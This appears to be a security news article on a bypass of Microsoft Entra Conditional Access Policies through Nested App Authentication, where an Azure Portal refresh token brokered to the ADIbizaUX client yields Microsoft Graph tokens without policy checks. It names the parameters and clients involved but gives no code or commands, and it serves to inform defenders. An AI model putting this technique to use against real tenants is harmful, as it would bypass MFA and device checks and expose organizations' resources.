Microsoft Entra Conditional Access Policies (CAPs), essential for securing Azure and Microsoft 365 environments, have been found susceptible to a bypass technique involving Nested App Authentication (NAA). This vulnerability, identified by security researchers, allows attackers to circumvent CAPs under specific conditions, potentially compromising organizational security.
CAPs are designed to enforce stringent authentication measures, including multi-factor authentication (MFA), device compliance, and location-based restrictions. They serve as a critical defense mechanism, especially when user credentials are compromised. However, recent findings indicate that attackers can exploit Microsoft’s custom OAuth implementation for Single Sign-On (SSO) to obtain Microsoft Graph access tokens without triggering Conditional Access evaluations.
Understanding Nested App Authentication
NAA is a framework within Microsoft’s SSO system that enables “host” applications, such as the Azure Portal, to act as authentication brokers for nested applications. This setup allows users to switch between services seamlessly without repeated authentication prompts. The host application utilizes its cached refresh token to silently acquire access tokens for child applications, streamlining the user experience.
This process involves specific redirect URIs and parameters like brk_client_id and brk_redirect_uri in OAuth token requests, facilitating token exchange between applications without user interaction.
The Vulnerability Exploited
The security flaw emerges when the NAA flow is employed with the ADIbizaUX client, a component integral to the Azure Portal’s identity and access management. ADIbizaUX possesses undocumented APIs and extensive pre-consented Microsoft Graph permissions, enabling it to manage users, groups, applications, directories, and even Conditional Access policies.
Researchers discovered that when an Azure Portal refresh token is brokered to ADIbizaUX to request a Microsoft Graph token, Conditional Access policies are not evaluated, yet an access token is still issued. This behavior contrasts with FOCI-enabled clients like Microsoft Teams, where similar refresh operations are correctly blocked by CAPs when a blocking policy is active. This discrepancy indicates that the issue is specific to the NAA-based flow and certain clients.
Further investigations identified additional Microsoft Intune portal extension applications that could also utilize an Azure Portal refresh token via NAA to obtain Microsoft Graph tokens without Conditional Access enforcement.
Potential Attack Scenarios
In a plausible attack scenario, an adversary would first need to acquire an Azure Portal refresh token, potentially through phishing campaigns or adversary-in-the-middle attacks targeting login.microsoftonline.com. The token’s fixed 24-hour lifetime and non-renewable nature add complexity to the attack but do not eliminate the risk.
Once in possession of the refresh token, the attacker could exploit the NAA flow to obtain access tokens for various services without triggering Conditional Access policies. This method effectively bypasses security measures like MFA and device compliance checks, granting unauthorized access to sensitive organizational resources.
Organizations relying on Microsoft Entra CAPs should be aware of this vulnerability and consider implementing additional security measures to mitigate potential exploitation. Regular monitoring of authentication flows and staying informed about emerging threats are crucial steps in maintaining a robust security posture.
